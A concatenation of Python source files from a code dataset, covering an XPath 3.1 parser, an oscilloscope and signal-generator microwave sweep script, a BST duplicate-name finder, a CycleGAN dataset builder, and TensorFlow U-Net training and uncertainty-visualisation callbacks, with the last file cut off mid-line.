distributed under the terms of the MIT License.\n# See the file 'LICENSE' in the root directory of the present\n# distribution, or http://opensource.org/licenses/MIT.\n#\n# @author Davide Brunato \n#\n\"\"\"\nXPath 3.1 implementation\n\"\"\"\nfrom ..namespaces import XPATH_MAP_FUNCTIONS_NAMESPACE, \\\n XPATH_ARRAY_FUNCTIONS_NAMESPACE # , XSLT_XQUERY_SERIALIZATION_NAMESPACE\nfrom ..xpath30 import XPath30Parser\n\n\nclass XPath31Parser(XPath30Parser):\n \"\"\"\n XPath 3.1 expression parser class.\n \"\"\"\n version = '3.1'\n\n SYMBOLS = XPath30Parser.SYMBOLS | set()\n \"\"\"\n {\n 'format-number', 'random-number-generator', 'collation-key',\n 'contains-token', 'parse-ietf-date',\n\n # Higher-order functions\n 'sort', 'apply', 'load-xquery-module', 'transform',\n\n # Maps and Arrays\n 'merge', 'size', 'keys', 'contains', 'get', 'find', 'put', 'entry',\n 'remove', 'append', 'subarray', 'remove', 'join', 'flatten',\n\n # Functions on JSON Data\n 'parse-json', 'json-doc', 'json-to-xml', 'xml-to-json',\n }\n \"\"\"\n\n DEFAULT_NAMESPACES = {\n 'map': XPATH_MAP_FUNCTIONS_NAMESPACE,\n 'array': XPATH_ARRAY_FUNCTIONS_NAMESPACE,\n **XPath30Parser.DEFAULT_NAMESPACES\n }\n\n\n##\n# XPath 3.0 definitions\nregister = XPath31Parser.register\nunregister = XPath31Parser.unregister\nliteral = XPath31Parser.literal\nprefix = XPath31Parser.prefix\ninfix = XPath31Parser.infix\ninfixr = XPath31Parser.infixr\nmethod = XPath31Parser.method\nfunction = XPath31Parser.function\n\nXPath31Parser.build()\n","sub_path":"flaskProject/venv/Lib/site-packages/elementpath/xpath31/xpath31_parser.py","file_name":"xpath31_parser.py","file_ext":"py","file_size_in_byte":1681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"125614562","text":"# -*- coding: utf-8 -*-\n\"\"\"\nOnOffDTG.py でDTGを動かすこと!\nCW ODMR は meow とぶつかるので、立ち上げずに、DTGのみこれでON OFFする\n\n\n- npz保存\n- binary 読み出し\n\n\nBy Yuta Masuyama\nCode to measure ozawa sample.\n\nCreated on Mon May 15 12:08:50 2017\n\n@author: NV\n\"\"\"\nimport modu_inst as ist\nimport time\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport visa\nimport os \n\nimport modu_htn as htn\nhtn.setFigParam()\n#######################################################################\n\n#mwpows = np.arange(-50, 1, 5)\nmwpows = [0.]\nfreq_ini = 1.0\nfreq_fin = 3.0\nfreq_step = 0.01\n\nwaitTime = 0.3# average の待ち時間\ntimeDiv = 500*10**-12#sec/div\nsample_sec = 20*10**9#sample / sec\nchannels =['C1'] \n\n\nmwSweep = np.arange(freq_ini, freq_fin, freq_step)*10**9\n#######################################################################\nparaDict = {'mwpows':mwpows, 'freq_ini':freq_ini, 'freq_fin':freq_fin, \n 'freq_step':freq_step, 'waitTime':waitTime, \n }\n\ndirectly = ist.makeResultDir()\n\nist.saveDict2Json(paraDict, name='parameter.jso', directry=directly)\n\n###############################################################################\nimport win32com.client #import the pywin32 library\nscope=win32com.client.Dispatch(\"LeCroy.ActiveDSOCtrl.1\") #creates instance of the ActiveDSO control\nscope.MakeConnection('IP:LCRY2803N55897')#Connects to the oscilloscope. Substitute your IP address\n\n#scope.WriteString(\"*RST\", True)#デバイスをリセット\n\n### 640ZiSetting ###\nscope.WriteString(\"INSPECT? WAVEDESC\", True)#my_instrument.query(\"INSPECT? WAVEDESC\")\nWAVEDESC = scope.ReadString(5000)#reads a maximum of 80 bytes\nwith open(os.path.join(directly,'640ZiSetting.txt'), 'w') as f:\n f.write(WAVEDESC)\n#memorySize = 100*10**3\n#scope.WriteString(\"MSIZ {}\".format(memorySize), True)\ntime.sleep(0.1) \n \n\nplt.close('all')\n\n### SG #########################################################################\n\nrm = visa.ResourceManager()\nprint(rm.list_resources())\n#class N5182B_S3(N5182B):\n# def __init__(self, power_bounds=(-140.0, 19.0), freq_bounds=(9.0E3, 6.0E9)):\n# N5182B.__init__(self, 'GPIB0::2', power_bounds, freq_bounds)\n\n#SG_N5182B = ist.N5182B('GPIB0::2',power_bounds=(-110.0, 9.0), freq_bounds=(9.0E3, 3.0E9)) #EEI\nSG_N5182B = ist.N5182B('GPIB0::2',power_bounds=(-140.0, 19.0), freq_bounds=(9.0E3, 6.0E9)) #S3\nSG_N5182B.output(False)\n\n\ndef plotSpectrum(timeArray, mwfreqs,volts):\n plt.figure(1, figsize = htn.calcFigSize(column =1, h_ratio= 0.7))\n plt.savefig(os.path.join(directly,str(mw_pow) +'dBm_Waveform.png'), dpi = 300)#transparent=True)\n \n plt.figure(figsize = htn.calcFigSize(column =1, h_ratio= 0.7))\n plt.plot(mwfreqs,volts)\n plt.savefig(os.path.join(directly,str(mw_pow) +'dBm_MWspec.png'), dpi = 300)#transparent=True)\n np.savetxt(os.path.join(directly,str(mw_pow) +'dBm_MWspec_volts.csv'), volts,delimiter=\",\")\n np.savetxt(os.path.join(directly,str(mw_pow) +'dBm_MWspec_mwfreqs.csv'), mwfreqs,delimiter=\",\")\n\n\n## ittan ###\n\n#my_instrument.write(\"DISPLAY OFF\")#ディスプレイの更新を止める.\nDEFAULT_BUFFER_SIZE = 80#出力文字サイズ\ncolors = ['b', 'g', 'r', 'm']\ntry:\n ### get memorySize ###\n assert scope.WriteString(\"MSIZ?\", True), 'MSIZ? --> can not communicate with 640Zi'\n value = scope.ReadString(DEFAULT_BUFFER_SIZE)\n memorySize = int(float(value))\n\n for j in range(len(mwpows)):\n mw_pow = mwpows[j]\n plt.close('all')\n mwfreqs =[]\n amps0 = []\n for i in range(len(mwSweep)):\n \n #リセットと確認\n scope.WriteString(\"C1:CLEAR_SWEEPS\", True)#積算のリセット\n scope.WriteString(\"*OPC?\", True)\n OPC = scope.ReadString(DEFAULT_BUFFER_SIZE)\n while OPC ==False:\n scope.WriteString(\"*OPC?\", True)\n OPC = scope.ReadString(DEFAULT_BUFFER_SIZE)\n print('*OPC? = 0')\n time.sleep(0.2) \n \n #mw_pow =\n mw_freq =mwSweep[i]\n filename= 'MW'+str(mw_pow) +'dBm' + str(mw_freq*10**-9)+'GHz' \n print(filename)\n \n \n ####\n SG_N5182B.setup_CW(mw_freq, mw_pow)\n SG_N5182B.output(True)\n time.sleep(waitTime) # cahnge wait depending on accumulation\n \n\n ### get wave ###\n scope.WriteString(\"COMM_FORMAT DEF9,WORD,BIN\", True)\n \n for i in range(len(channels)):\n ch = channels[i]\n assert scope.WriteString( ch+\":WAVEFORM? DAT1\", True), 'WAVEFORM? --> can not communicate with 640Zi'\n timeArray, Waveform = scope.GetScaledWaveformWithTimes(ch, memorySize, 0)#第一引数に転送するトレースの指定、第2 引数に最大バッファサイズ、第3 引数は通常1を指定\n Waveform = np.array(Waveform) \n sampleSize = 10*timeDiv*sample_sec+2\n timeArray = np.arange(sampleSize)/sample_sec\n \n \n ### calc initial val ###\n def myfunc(x, a, b, c, d):\n if b < 0:\n return np.inf\n else:\n return a*np.sin(2 * np.pi * b*x + c) + d \n \n v0= ( (np.max(Waveform) - np.min(Waveform))/2, mw_freq, 0, np.mean(Waveform))\n popt, pcov, SD = htn.data_fit(myfunc, timeArray, Waveform, initial_param1=v0)\n timeArray_fit = np.linspace(min(timeArray), max(timeArray), 500)\n \n \n \n np.savez(os.path.join(directly,filename+ch+'.npz'), tim=timeArray, vol=Waveform)\n \n if i ==0:\n plt.figure(1)\n plt.clf()\n amps0.append( abs(popt[0]))\n mwfreqs.append(mw_freq)\n \n if True:\n plt.figure(1, figsize = htn.calcFigSize(column =1, h_ratio= 0.7))\n plt.title(filename)\n plt.plot(timeArray, Waveform, colors[i]+'o', alpha=0.6)\n plt.plot(timeArray_fit, myfunc(timeArray_fit,*popt), colors[i]+'-')\n if ch==channels[-1]:\n plt.xlabel('Time (s)')\n plt.ylabel('Voltage (V)')\n plt.tight_layout()\n plt.savefig(os.path.join(directly,filename+'_waveform_total.png'), dpi = 300)#transparent=True)\n \n \n \n\n \n plt.figure(2)\n plt.clf()\n plt.plot(np.array(mwfreqs)/10**9, amps0, 'bo-')\n plt.xlim(freq_ini, freq_fin)\n plt.pause(.01)\n \n if len(mwpows)!=1:\n plotSpectrum(timeArray, mwfreqs,amps0)\n \n\n \n \n \n\nexcept KeyboardInterrupt:# Ctrl-C を捕まえた!\n print('interrupted!')\n # プログラムをこの時点で殺すなら sys.exit する\n\n\nfinally:\n SG_N5182B.output(False)\n #my_instrument.write(\"DISPLAY ON\") \n scope.Disconnect() #Disconnects from the oscilloscope\n \n plotSpectrum(timeArray, mwfreqs,amps0) \n plt.show() \n print('Data at '+ directly)\n\n\n\n","sub_path":"Tool/20170913_readOscillo_fit_MWsweep.py","file_name":"20170913_readOscillo_fit_MWsweep.py","file_ext":"py","file_size_in_byte":7381,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"634009661","text":"import time\nfrom binary_search_tree import BSTNode\nstart_time = time.time()\n\nf = open('names_1.txt', 'r')\nnames_1 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nf = open('names_2.txt', 'r')\nnames_2 = f.read().split(\"\\n\") # List containing 10000 names\nf.close()\n\nduplicates = [] # Return the list of duplicates in this data structure\n\n# Replace the nested for loops below with your improvements\n# for name_1 in names_1:\n# for name_2 in names_2:\n# if name_1 == name_2:\n# duplicates.append(name_1)\n\n\n# solution using BST \n# first create bst starting with the first name in first list\nbst = BSTNode(names_1[0]) \n\n# insert all of the name except the name which is already the root node\nfor i in range(1,len(names_2)):\n bst.insert(names_1[i])\n\n# loop through the second list and use the bst contains method to find duplicate names\nfor name in names_2:\n if bst.contains(name):\n duplicates.append(name)\n\n# runtime varies slightly each time; example runtimes recorded:\n\n# runtime: 0.11457705497741699 seconds\n# runtime: 0.10380697250366211 seconds\n# runtime: 0.13980579376220703 seconds\n# runtime: 0.11453890800476074 seconds\n# runtime: 0.11601901054382324 seconds\n# runtime: 0.11406302452087402 seconds\n# runtime: 0.12554717063903809 seconds\n# runtime: 0.13164591789245605 seconds\n# runtime: 0.11376214027404785 seconds\n\nend_time = time.time()\nprint (f\"{len(duplicates)} duplicates:\\n\\n{', '.join(duplicates)}\\n\\n\")\nprint (f\"runtime: {end_time - start_time} seconds\")\n\n# ---------- Stretch Goal -----------\n# Python has built-in tools that allow for a very efficient approach to this problem\n# What's the best time you can accomplish? Thare are no restrictions on techniques or data\n# structures, but you may not import any additional libraries that you did not write yourself.\n","sub_path":"names/names.py","file_name":"names.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"15151176","text":"import os\nfrom pathlib import Path\nimport numpy as np\nimport cv2\nimport dsconf\nimport imgutil\n\ndef Build(imagesDir, datasetsDir):\n\t\"\"\"指定ディレクトリ内の画像ファイルからデータセットを作成する.\n\t# Args:\n\t\timagesDir: 画像ファイルが入ったディレクトリ名.\n\t\tdatasetsDir: 出力先データセットディレクトリ名.\n\t\"\"\"\n\n\t# CycleGAN用���ータセットディレクトリ作成\n\tcgd = os.path.join(datasetsDir, \"cyclegan\")\n\tif not os.path.isdir(cgd):\n\t\tos.mkdir(cgd)\n\n\t# 出力先データセットディレクトリに白バックとそれ以外用ディレクトリ作成\n\tnbd = os.path.join(cgd, \"nb\")\n\tif not os.path.isdir(nbd):\n\t\tos.mkdir(nbd)\n\twbd = os.path.join(cgd, \"wb\")\n\tif not os.path.isdir(wbd):\n\t\tos.mkdir(wbd)\n\n\tmaxSize = max(dsconf.MaxImageSize[0], dsconf.MaxImageSize[1])\n\n\t# 指定ディレクトリ内の画像ファイル一覧取得\n\tp = Path(imagesDir)\n\tpls = []\n\tpls.extend(p.glob(\"*.jpg\"))\n\tpls.extend(p.glob(\"*.png\"))\n\tpls.extend(p.glob(\"*.jpeg\"))\n\timageCount = len(pls)\n\tconvertedCount = 0\n\n\tfor pl in pls:\n\t\tfile = os.path.normpath(os.path.join(imagesDir, pl.name))\n\t\timg = cv2.imread(file, cv2.IMREAD_COLOR)\n\t\tif img is None or img.shape[0] < 128 or img.shape[1] < 128:\n\t\t\timageCount -= 1\n\t\t\tcontinue\n\n\t\t# モノトーンはスキップする\n\t\thsv = cv2.cvtColor(img, cv2.COLOR_BGR2HSV_FULL)\n\t\thsv = hsv.transpose(2, 0, 1)\n\t\tif np.mean(hsv[1]) < 20:\n\t\t\timageCount -= 1\n\t\t\tcontinue\n\n\t\t# イメージを所定のサイズへ縮小\n\t\timg = imgutil.ResizeIfLarger(img, maxSize)\n\n\t\t# 白バックかどうか判定して保存先ディレクトリを分けて保存\n\t\td = wbd if _isWhiteBack(img) else nbd\n\t\tf = os.path.splitext(pl.name)[0]\n\t\tcv2.imwrite(os.path.normpath(os.path.join(d, f + \".png\")), img)\n\n\t\tconvertedCount += 1\n\t\tprint(convertedCount, \"/\", imageCount)\n\ndef _isWhiteBack(img):\n\t\"\"\"指定イメージが白バックかどうか判定する\n\t# Args:\n\t\timg: 判定元イメージ\n\t# Returns:\n\t\t白バックなら True.\n\t\"\"\"\n\timg = img.transpose(2, 0, 1)\n\n\t# イメージの淵を取得し、白かどうか判定する\n\tt = img[:, :16, :]\n\tb = img[:, -16:, :]\n\tl = img[:, :, :16]\n\tr = img[:, :, -16:]\n\n\t# 淵の最も暗い部分が指定値より明るければ白バックとする\n\tthreshold = 200\n\tif threshold <= np.min(t) and threshold <= np.min(b) and threshold <= np.min(l) and threshold <= np.min(r):\n\t\treturn True\n\n\t# 淵の平均値が指定値より明るくても白バックとする\n\tthreshold = 230\n\tif threshold <= np.mean(t) and threshold <= np.mean(b) and threshold <= np.mean(l) and threshold <= np.mean(r):\n\t\treturn True\n\n\treturn False\n","sub_path":"CycleGan/dsbuilder.py","file_name":"dsbuilder.py","file_ext":"py","file_size_in_byte":2643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"126586326","text":"import h5py\nimport os\n\nfrom PySide2.QtWidgets import QListWidgetItem\n\nfrom hexrd.ui.ui_loader import UiLoader\n\nclass LoadHDF5Dialog:\n\n def __init__(self, f, saved_path=None, parent=None):\n self.file = f\n self.paths = []\n\n self.get_paths(f)\n\n loader = UiLoader()\n self.ui = loader.load_file('load_hdf5_dialog.ui', parent)\n self.create_list()\n\n def get_paths(self, f):\n img = h5py.File(f, 'r')\n self.file = img\n img.visit(self.add_path)\n\n def add_path(self, name):\n if isinstance(self.file[name], h5py.Dataset):\n self.paths.append(name)\n\n def create_list(self):\n path_list = self.ui.hdf5_paths\n path_list.clear()\n for i in range(len(self.paths)):\n path = QListWidgetItem(self.paths[i], path_list)\n path_list.addItem(path)\n\n def results(self):\n remember = self.ui.remember_path.isChecked()\n\n path_list = self.ui.hdf5_paths.currentItem().text()\n group = os.path.split(path_list)[0]\n dataset = os.path.split(path_list)[1]\n\n return group, dataset, remember","sub_path":"hexrd/ui/load_hdf5_dialog.py","file_name":"load_hdf5_dialog.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"462266051","text":"import torch\ninput = [3,4,6,5,7,\n 2,4,6,8,2,\n 1,6,7,8,4,\n 9,7,4,6,2,\n 3,7,5,4,1]\n\n# 使用view固定为一个张量B×C×W×H\ninput = torch.Tensor(input).view(1, 1, 5, 5)\n\n# 定义卷积\nconv_layer = torch.nn.Conv2d(1, 1, kernel_size=3, padding=1, bias=False)\n\n# 将一个向量转化为张量赋值给kernel卷积核 \nkernel = torch.Tensor([1,2,3,4,5,6,7,8,9]).view(1, 1, 3, 3)\n\n# 卷积权重的初始化\nconv_layer.weight.data = kernel.data\n\n# 卷积\noutput = conv_layer(input)\nprint(output)\n","sub_path":"class9卷积神经网络基础/padding.py","file_name":"padding.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"18110572","text":"import csv\nfrom os.path import join\nfrom os import makedirs\n\nimport matplotlib\nimport numpy as np\nimport pandas as pd\nfrom scipy import ndimage\nfrom imageio import imwrite\n\nfrom tf_unet.analyze.cca import cca_img_no_unc as cca_img\nfrom tf_unet.analyze.cca import remove_tiny_les, paint_cca_img, ohe\nfrom tf_unet.utils.np_utils import sigmoid\n\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\n\n_ALPHA = 0.5\n_MIN_SLICE = 5\n_MAX_SLICE = 59\n\n\nclass CSVCallback:\n def __init__(self, csvfile, examples_per_epoch):\n self.__csvfile = csvfile\n self.__examples_per_epoch = examples_per_epoch\n self.__initialized = False\n\n def __call__(self, epoch, stats):\n if not self.__initialized:\n with open(self.__csvfile, 'w', newline='') as f:\n csvwriter = csv.writer(f, delimiter=',')\n csvwriter.writerow(\n ['epoch', 'examples_seen', 'train_loss', 'train_dice', 'val_loss', 'val_dice', 'tpr', 'ppv'])\n self.__initialized = True\n with open(self.__csvfile, 'a', newline='') as f:\n csvwriter = csv.writer(f, delimiter=',')\n csvwriter.writerow([epoch,\n epoch * self.__examples_per_epoch,\n stats['train_loss'],\n stats['train_dice'],\n stats['loss'],\n stats['dice'],\n stats['tpr'],\n stats['ppv']])\n\n\nclass PlotCallback:\n def __init__(self, csvfile, output_path):\n self.__csvfile = csvfile\n self.__out_dir = join(output_path, 'plots')\n makedirs(self.__out_dir, exist_ok=True)\n\n def __call__(self):\n data = np.asarray(pd.read_csv(self.__csvfile, header=None))\n nb_examples = np.asarray(data[1:, 1], np.int32)\n train_loss = np.asarray(data[1:, 2], np.float32)\n train_dice = np.asarray(data[1:, 3], np.float32)\n val_loss = np.asarray(data[1:, 4], np.float32)\n val_dice = np.asarray(data[1:, 5], np.float32)\n tpr = np.asarray(data[1:, 6], np.float32)\n ppv = np.asarray(data[1:, 7], np.float32)\n # fdr = np.asarray(data[1:,7], np.float32)\n # ppv = np.asarray(data[1:,8], np.float32)\n # fpr = np.asarray(data[1:,9], np.float32)\n # fnr = np.asarray(data[1:,10], np.float32)\n # f1_score = np.asarray(data[1:,11], np.float32)\n\n plt.plot(nb_examples, train_loss, '--b.', label='train_loss')\n plt.plot(nb_examples, val_loss, '--g.', label='val_loss')\n plt.ylabel('Loss')\n plt.xlabel('Training Examples Seen')\n plt.legend()\n plt.savefig(join(self.__out_dir, 'loss.png'))\n plt.close()\n\n plt.plot(nb_examples, train_dice, '--b.', label='train_dice')\n plt.plot(nb_examples, val_dice, '--g.', label='val_dice')\n plt.ylabel('DICE Coefficient')\n plt.xlabel('Training Examples Seen')\n plt.legend()\n plt.savefig(join(self.__out_dir, 'dice.png'))\n plt.close()\n\n plt.plot(nb_examples, tpr, '--b.', label='TPR')\n plt.plot(nb_examples, ppv, '--g.', label='PPV')\n plt.ylabel('TPR and PPV')\n plt.xlabel('Training Examples Seen')\n plt.legend()\n plt.savefig(join(self.__out_dir, 'tpr_ppv.png'))\n plt.close()\n\n\nclass ValidationLoss:\n def __init__(self, data_gen, nb_val_samples, cca_thresh, batch_size):\n \"\"\"\n :param data_gen: generator that yields validation data\n :param int nb_val_samples: number of validation samples to yield from data_gen\n \"\"\"\n self.__nb_val_samples = nb_val_samples\n self.__data_gen = data_gen\n self.__thresh = cca_thresh\n self.__batch_size = batch_size\n self.__nb_ex = nb_val_samples * batch_size\n\n def __call__(self, sess, net, epoch, cw):\n loss_sum = 0\n dice_sum = 0\n ppv_sum = 0\n tpr_sum = 0\n x_valid, y_valid = self.__data_gen.get_next()\n for i in range(self.__nb_val_samples):\n x_batch, y_batch = sess.run([x_valid, y_valid])\n mu, loss, dice = sess.run([net.predictor, net.loss, net.dice],\n feed_dict={net.x: x_batch, net.y: y_batch, net.keep_prob: .5,\n net.class_weight: cw})\n for img in range(mu.shape[0]):\n stats = cca_img(mu[img, ..., 0], y_batch[img, ..., 0], self.__thresh)\n ppv_sum += 1 - stats['fdr']['all']\n tpr_sum += stats['tpr']['all']\n\n loss_sum += np.sum(loss)\n dice_sum += np.sum(dice)\n val_stats = {'loss': loss_sum / self.__nb_val_samples, 'dice': dice_sum / self.__nb_val_samples,\n 'ppv': ppv_sum / self.__nb_ex, 'tpr': tpr_sum / self.__nb_ex}\n return val_stats\n\n\nclass Visualizer:\n def __init__(self, data_gen, out_dir, nb_imgs=50):\n \"\"\"\n :param data_gen:\n :param str out_dir:\n :param int nb_imgs:\n \"\"\"\n self.__image_dir = join(out_dir, 'images')\n self.__nb_imgs = nb_imgs\n makedirs(self.__image_dir, exist_ok=True)\n self.__data = None\n self.__imgs = None\n self.__imgs_tru = None\n self.__sidx = None\n self._prep_data(data_gen)\n\n def __call__(self, sess, net, epoch):\n y_prd = []\n for x, y in self.__data:\n y_prd.append(sess.run(net.predictor, feed_dict={net.x: x, net.y: y, net.keep_prob: 1.}))\n y_prd = np.asarray(y_prd)\n\n canvas = self._get_canvas(y_prd)\n # imwrite(join(self.__image_dir, \"t1_{:03d}.png\".format(epoch)), canvas[0])\n imwrite(join(self.__image_dir, \"t2_{:03d}.png\".format(epoch)), canvas[1])\n # imwrite(join(self.__image_dir, \"flair_{:03d}.png\".format(epoch)), canvas[2])\n\n def _prep_data(self, data_gen):\n print(\"preparing validation data... \")\n data = []\n xb = []\n yb = []\n for i in range(self.__nb_imgs * 2):\n if i % 20 == 0:\n print(' preparing {}/{}'.format(i // 2, self.__nb_imgs))\n\n x, y = next(data_gen)\n if i % 2 == 0:\n continue\n data.append((x, y))\n xb.append(x)\n yb.append(y)\n\n self.__data = data\n x = np.asarray(xb)\n y = np.asarray(yb)\n\n self.__imgs_tru = 255 * np.repeat(np.expand_dims(_ALPHA * x[:, 0, ...], -1), 3, -1) + \\\n (1 - _ALPHA) * \\\n np.repeat(np.expand_dims(np.repeat(y[:, 0, ...], 3, -1), -1), 3, -1) * [0, 255, 0]\n self.__imgs = x[:, 0, ...] # 50, 192, 192, 64, 3\n self._set_sidx(y)\n\n def _set_sidx(self, y):\n y_imgs = y[:, 0, ..., 0]\n sidx = np.argmax(y_imgs.sum(1).sum(1), -1)\n sidx[sidx < _MIN_SLICE] = 30\n sidx[sidx > _MAX_SLICE] = 30\n self.__sidx = sidx\n\n def _get_canvas(self, y_prd):\n sx, sy, sz, ch = y_prd.shape[2:] # (50, 2, 192, 192, 64, 1)\n imgs_prd = 255 * np.repeat(np.expand_dims(_ALPHA * self.__imgs, -1), 3, -1) + \\\n (1 - _ALPHA) * np.repeat(np.expand_dims(np.repeat(y_prd[:, 0, ...], 3, -1), -1), 3, -1) * [255, 0, 0]\n # 50, 192, 192, 64, 3\n\n out = np.zeros((2 * y_prd.shape[0], sx, sy, 3, 3)) # 50, 192, 192, 3, 3\n for i in range(len(imgs_prd)):\n out[2 * i] = self.__imgs_tru[i, :, :, self.__sidx[i], :, :]\n out[2 * i + 1] = imgs_prd[i, :, :, self.__sidx[i], :, :]\n\n canvas = np.zeros((3, 10 * sx, 10 * sy, 3), dtype='uint8')\n count = 0\n for j in range(10):\n for k in range(10):\n canvas[:, (j * sx):(j * sx + sx), (k * sy):(k * sy + sy), :] = \\\n np.flip(out[count].transpose(2, 1, 0, 3), 1)\n count += 1\n return canvas\n\n\nclass MIUncertaintyVisualizer:\n def __init__(self, sess, data_gen, out_dir, nb_mc=5, nb_imgs=12, dim=6, nb_ch=4):\n \"\"\"\n :param data_gen:\n :param str out_dir:\n :param int nb_mc\n :param int nb_imgs:\n \"\"\"\n self._image_dir = join(out_dir, 'images')\n self._nb_imgs = nb_imgs\n makedirs(self._image_dir, exist_ok=True)\n self._nb_mc = nb_mc\n self._dim = dim\n self._data = None\n self._imgs = None\n self._imgs_tru = None\n self._sidx = None\n self._nb_ch = nb_ch\n self._prep_data(sess, data_gen)\n\n def __call__(self, sess, net, epoch):\n mus = []\n y_dummy = np.empty((1, 192, 192, 64, 1))\n for x in self._x_mc:\n mu = sess.run(net.predictor, feed_dict={net.x: x, net.y: y_dummy, net.keep_prob: .5, net.class_weight: 1})\n mus.append(mu)\n\n mus_mcs = np.asarray(mus)\n mus_mcs = mus_mcs.reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n y_prd = np.expand_dims(sigmoid(np.mean(mus_mcs, 0)), -1) # nb_img, 192, 192, 64, 1\n bald = self._bald_uncertainty(sigmoid(mus_mcs))\n y_prd = y_prd[:, 0, ..., 0] # 12, 1, 192, 192, 64, 1, 1\n canvas = self._get_canvas_bald_prd(y_prd, bald)\n\n # imwrite(join(self._image_dir, \"t1_{:03d}.png\".format(epoch)), canvas[0])\n imwrite(join(self._image_dir, \"t2_{:03d}.png\".format(epoch)), canvas[1])\n # imwrite(join(self._image_dir, \"flair_{:03d}.png\".format(epoch)), canvas[2])\n\n @staticmethod\n def _bald_uncertainty(prd):\n # https://arxiv.org/pdf/1703.02910.pdf\n mcs = np.repeat(prd, 2, -1)\n mcs[..., 0] = 1 - mcs[..., 1] # 10, nb_img, 192, 192, 64, 2\n\n entropy = -np.sum(np.mean(mcs, 0) * np.log(np.mean(mcs, 0) + 1e-5), -1)\n expected_entropy = -np.mean(np.sum(mcs * np.log(mcs + 1e-5), -1), 0)\n bald = entropy - expected_entropy\n return bald\n\n def _prep_data(self, sess, data_gen):\n print(\"preparing validation data... \")\n data = []\n xb = []\n yb = []\n i = 0\n x_valid, y_valid = data_gen.get_next()\n while len(yb) < self._nb_imgs:\n if i % 2 == 0:\n i += 1\n continue\n x, y = sess.run([x_valid, y_valid])\n ysum = y[0].sum()\n if ysum < 5:\n continue\n y = np.expand_dims(y[..., 0], -1)\n # remove lesions that are <=2 voxels (because they serve as an unfair comparison)\n y = remove_tiny_les(y)\n data.append((x, y))\n xb.append(x)\n yb.append(y)\n i += 1\n\n print('done')\n self._data = data\n\n x = np.asarray(xb) # nb_im, bs, 192, 192, 64, 3\n y = np.asarray(yb) # nb_im, bs, 192, 192, 64, 1\n\n self._x_mc = np.repeat(np.expand_dims(x[:, 0, ...], 0), self._nb_mc, 0). \\\n reshape((x.shape[0] * self._nb_mc,) + x.shape[2:]) # nb_mc*nb_im, 192, 192, 64, 3\n self._x_mc = np.expand_dims(self._x_mc, 1)\n self._imgs_tru = 255 * np.repeat(np.expand_dims(_ALPHA * x[:, 0, ...], -1), 3, -1) + (1 - _ALPHA) * \\\n np.repeat(np.expand_dims(np.repeat(y[:, 0, ...], self._nb_ch, -1), -1), 3, -1) * [0, 255, 0]\n self._imgs = x[:, 0, ...] # 50, 192, 192, 64, 3\n self._set_sidx(y)\n\n def _set_sidx(self, y):\n y_imgs = y[:, 0, ..., 0]\n sidx = np.argmax(y_imgs.sum(1).sum(1), -1)\n sidx[sidx < _MIN_SLICE] = 30\n sidx[sidx > _MAX_SLICE] = 30\n self._sidx = sidx\n\n def _get_canvas_bald_prd(self, y_prd, bald):\n sx, sy, sz, ch = y_prd.shape[1:] # (50, 192, 192, 64, 1)\n dim = self._dim\n imgs_prd = 255 * np.repeat(np.expand_dims(_ALPHA * self._imgs, -1), 3, -1) + \\\n (1 - _ALPHA) * np.repeat(np.expand_dims(np.repeat(y_prd, self._nb_ch, -1), -1), 3, -1) * [255, 0, 0]\n # 50, 192, 192, 64, 3, 3\n\n bald = np.repeat(np.expand_dims(np.repeat(\n np.expand_dims(bald, -1), self._nb_ch, -1), -1), 3, -1) * [255, 0, 0] # 50, 192, 192, 64, 3\n bald = bald[:, 0]\n out = np.zeros((3 * y_prd.shape[0], sx, sy, self._nb_ch, 3)) # 3*12, 192, 192, 3, 3\n for i in range(len(imgs_prd)):\n out[3 * i] = self._imgs_tru[i, :, :, self._sidx[i], :, :]\n out[3 * i + 1] = imgs_prd[i, :, :, self._sidx[i], :, :]\n out[3 * i + 2] = bald[i, :, :, self._sidx[i], :, :]\n\n canvas = np.zeros((3, dim * sx, dim * sy, 3), dtype='uint8')\n count = 0\n for j in range(dim):\n for k in range(dim):\n canvas[:, (j * sx):(j * sx + sx), (k * sy):(k * sy + sy), :] = \\\n np.flip(out[count].transpose(2, 1, 0, 3), 1)\n count += 1\n return canvas\n\n\nclass AllUncertaintyVisualizer(MIUncertaintyVisualizer):\n def __call__(self, sess, net, epoch):\n mus = []\n log_vars = []\n for x in self._x_mc:\n mu, log_var = sess.run([net.predictor, net.log_variance], feed_dict={net.x: x, net.keep_prob: .5})\n mus.append(mu)\n log_vars.append(log_var)\n mus_mcs = np.asarray(mus)\n mus_mcs = mus_mcs.reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n log_var_mcs = np.asarray(log_vars).reshape((self._nb_mc, -1) + mus_mcs.shape[1:])\n\n y_prd = np.expand_dims(sigmoid(np.mean(mus_mcs, 0)), -1)\n bald = self._bald_uncertainty(sigmoid(mus_mcs)) # (nb_img, 1, 192, 192, 64)\n ent = self._entropy(sigmoid(mus_mcs))\n prd_var = self._prd_variance(log_var_mcs)\n prd_unc = self._prd_uncertainty(mus_mcs, prd_var)\n\n y_prd = y_prd[:, 0, ..., 0] # 12, 1, 192, 192, 64, 1, 1\n bald_canvas = self._get_bald_canvas(y_prd, bald)\n ent_canvas = self._get_entropy_canvas(y_prd, ent)\n prd_var_canvas = self._get_prd_var_canvas(y_prd, prd_var)\n prd_unc_canvas = self._get_prd_unc_canvas(y_prd, prd_unc)\n\n # imwrite(join(self._image_dir, \"t1_{:03d}.png\".format(epoch)), canvas[0])\n imwrite(join(self._image_dir, \"t2_bald_{:03d}.png\".format(epoch)), bald_canvas[1])\n imwrite(join(self._image_dir, \"t2_ent_{:03d}.png\".format(epoch)), ent_canvas[1])\n imwrite(join(self._image_dir, 